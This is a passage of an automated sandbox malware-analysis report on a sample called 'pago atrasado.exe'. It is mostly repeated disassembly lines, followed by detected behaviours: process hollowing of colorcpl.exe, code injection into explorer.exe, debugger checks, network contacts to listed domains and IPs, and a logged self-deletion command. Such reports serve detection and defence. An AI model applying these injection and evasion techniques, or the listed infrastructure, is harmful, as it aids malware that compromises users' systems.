          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04557D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04573D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04553A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04568E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04578EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeDomain query: www.ttemola.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 46.101.121.244 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exeDomain query: www.baybeg.com
          Source: C:\Windows\explorer.exeDomain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exeDomain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exeDomain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeMemory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100098CF cpuid
